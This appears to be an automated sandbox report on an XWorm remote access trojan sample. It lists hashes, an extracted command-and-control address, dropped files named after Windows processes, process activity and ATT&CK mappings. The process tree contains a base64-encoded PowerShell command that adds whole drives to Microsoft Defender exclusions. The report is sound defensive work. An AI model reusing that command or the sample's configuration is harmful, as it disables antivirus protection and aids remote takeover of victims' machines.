xworm | fd3b7fe5e00fa4cc4f959db0c97908202a0f8054bf3aebecc57bf22f30f349ae

General

Target

jjj.exe
Size

773KB
MD5

87a896c479974de2a6e2bea021e4ba23
SHA1

67e4d876097d823c18bd06d13250e27b1645080c
SHA256

fd3b7fe5e00fa4cc4f959db0c97908202a0f8054bf3aebecc57bf22f30f349ae
SHA512

2f510199800543655403476360b5815ceb87f74bc60c6c51cbebd1baf25ce48254f53ce6e8f430f1981f3aef03bc371f8d177a0e9a64f01b1fb7323d0fb353e2
SSDEEP

12288:iTfx1EdDy76ztuJdJHR4ih+IbwOnNeFknYhzQ0GyG4Gt1BfPnM2vDwvfxCo:W18VJqdduigIsOnNe44E0GFPz82vDgz

Score

10^/10

xworm defense_evasion rat trojan

Malware Config

Extracted

Family

xworm

C2

83.38.24.1:1603

Attributes

Install_directory
%Userprofile%
install_file
svhost.exe

Signatures

Detect Xworm Payload 10 IoCs

resource	yara_rule
behavioral1/files/0x00070000000120fc-8.dat	family_xworm
behavioral1/memory/3016-14-0x00000000003B0000-0x00000000003D4000-memory.dmp	family_xworm
behavioral1/files/0x0007000000019470-23.dat	family_xworm
behavioral1/files/0x00070000000193b8-20.dat	family_xworm
behavioral1/memory/2904-28-0x0000000000EA0000-0x0000000000EB4000-memory.dmp	family_xworm
behavioral1/files/0x0006000000019489-30.dat	family_xworm
behavioral1/memory/2784-27-0x0000000000240000-0x0000000000284000-memory.dmp	family_xworm
behavioral1/memory/2772-26-0x0000000000AB0000-0x0000000000AE2000-memory.dmp	family_xworm
behavioral1/files/0x0008000000019394-11.dat	family_xworm
behavioral1/memory/2800-37-0x0000000000AB0000-0x0000000000ADC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 5 IoCs

pid	Process
2904	svhost.exe
3016	WmiPrvSE.exe
2784	SecurityHealthSystray.exe
2772	OneDrive.exe
2800	SearchFilterHost.exe

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com
2	ip-api.com
3	ip-api.com
4	ip-api.com
5	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SearchFilterHost.exe	jjj.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	OneDrive.exe
Token: SeDebugPrivilege	2904	svhost.exe
Token: SeDebugPrivilege	3016	WmiPrvSE.exe
Token: SeDebugPrivilege	2800	SearchFilterHost.exe
Token: SeDebugPrivilege	2784	SecurityHealthSystray.exe
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 2960	2448	jjj.exe	29
PID 2448 wrote to memory of 2960	2448	jjj.exe	29
PID 2448 wrote to memory of 2960	2448	jjj.exe	29
PID 2448 wrote to memory of 2904	2448	jjj.exe	31
PID 2448 wrote to memory of 2904	2448	jjj.exe	31
PID 2448 wrote to memory of 2904	2448	jjj.exe	31
PID 2448 wrote to memory of 3016	2448	jjj.exe	32
PID 2448 wrote to memory of 3016	2448	jjj.exe	32
PID 2448 wrote to memory of 3016	2448	jjj.exe	32
PID 2448 wrote to memory of 2784	2448	jjj.exe	33
PID 2448 wrote to memory of 2784	2448	jjj.exe	33
PID 2448 wrote to memory of 2784	2448	jjj.exe	33
PID 2448 wrote to memory of 2772	2448	jjj.exe	34
PID 2448 wrote to memory of 2772	2448	jjj.exe	34
PID 2448 wrote to memory of 2772	2448	jjj.exe	34
PID 2448 wrote to memory of 2800	2448	jjj.exe	35
PID 2448 wrote to memory of 2800	2448	jjj.exe	35
PID 2448 wrote to memory of 2800	2448	jjj.exe	35

C:\Users\Admin\AppData\Local\Temp\jjj.exe
"C:\Users\Admin\AppData\Local\Temp\jjj.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAcABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcQB3ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Users\Admin\WmiPrvSE.exe
  "C:\Users\Admin\WmiPrvSE.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Users\Admin\SecurityHealthSystray.exe
  "C:\Users\Admin\SecurityHealthSystray.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
  "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\SearchFilterHost.exe
  "C:\Windows\SearchFilterHost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OneDrive.exe

Filesize
177KB

MD5
321e9bcf67cbbbc238c123f42a2a6e62

SHA1
01346677f67ae5df7df9cd2cab70fa342b3a4c32

SHA256
8e88ef60280096bc438183cdd0ff866e23412c319a0ce7b41ffade3f55425002

SHA512
c83f5ecb5e88a11853f9a2a07b39fdce3e14cc03c0366f020d74cd75aae406f9347c4a6b81e830e974fc290efdf444b30d8cf1316ee8777b4f2501ef3bcb2555

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
58KB

MD5
9a363c5e7413fdc762f6999441cfe0d3

SHA1
536de532e5e06e64ecf0692da96fa704bbfaa88c

SHA256
5bbd989946339b7a649afc76fdc1f724880a04449ad7cf8cba2cc191384dc0f5

SHA512
00732d099d7a78e7010ba4beebdaa6f3a3c4439a47f52bf641f1f206d828e7f82c862c39ab6995131e841880c9c6a05f41b1cce3f476c760664534c8b46248f5

Download Submit
C:\Users\Admin\SecurityHealthSystray.exe

Filesize
251KB

MD5
a7209832f2c21ce4c6e351b1f1d4749c

SHA1
5849477602755a1a2be4fc2a8a395dc8f523fc07

SHA256
b5ed60d7bda3cfe44a7397c5378ed4bce4f8a700508835a4b58169a74e355ea8

SHA512
912f4355fa7c64d5da527d7b7ed3389690c39a6fa89192efc5a8093d4425f00f47c2ecd182f86df720d9c3b471a34ec659235ad35780a794cfa2ebe065220ea1

Download Submit
C:\Users\Admin\WmiPrvSE.exe

Filesize
122KB

MD5
7d9b4554f40cff6fd14f88a1d962aa18

SHA1
7e2b4a48208cb5a16ad28e28b8deff672b39f91c

SHA256
af1a768786ee5fbc4ee20de4d7ac56fc22b88e37382579e007b68ffba53a91a2

SHA512
b5d892c3f495442680f6fa10b556085b051a72a258781619442ae8f4afd483511f4b634375c62d75bb0d99d39a80f4e936360b2df4454685f74aef7305b684ba

Download Submit
C:\Windows\SearchFilterHost.exe

Filesize
154KB

MD5
e83d7a2812b8b9fc0b168baef465c8ab

SHA1
d708a9b78001ab9e4708091e241c64dc5b3b6a9e

SHA256
c0666c0fad2ce0cca691b9a6b9f8bc59e8e5319e8a79961d7aa4eabba3b3cd0d

SHA512
b49c0d14769c4aa949329b76b92f913746949887343c6567077ddc4d40e5613c1887d76bd0fcca7bdf4b59e1fa37c3184fd897d87210e8dce6c88bab60b1484b

Download Submit
memory/2448-1-0x0000000001290000-0x0000000001358000-memory.dmp

Filesize
800KB

Download
memory/2448-2-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

Filesize
9.9MB

Download
memory/2448-32-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

Filesize
9.9MB

Download
memory/2448-0-0x000007FEF5B13000-0x000007FEF5B14000-memory.dmp

Filesize
4KB

Download
memory/2772-26-0x0000000000AB0000-0x0000000000AE2000-memory.dmp

Filesize
200KB

Download
memory/2784-27-0x0000000000240000-0x0000000000284000-memory.dmp

Filesize
272KB

Download
memory/2800-37-0x0000000000AB0000-0x0000000000ADC000-memory.dmp

Filesize
176KB

Download
memory/2904-28-0x0000000000EA0000-0x0000000000EB4000-memory.dmp

Filesize
80KB

Download
memory/2960-38-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2960-39-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/3016-14-0x00000000003B0000-0x00000000003D4000-memory.dmp

Filesize
144KB

Download

Analysis

Sharing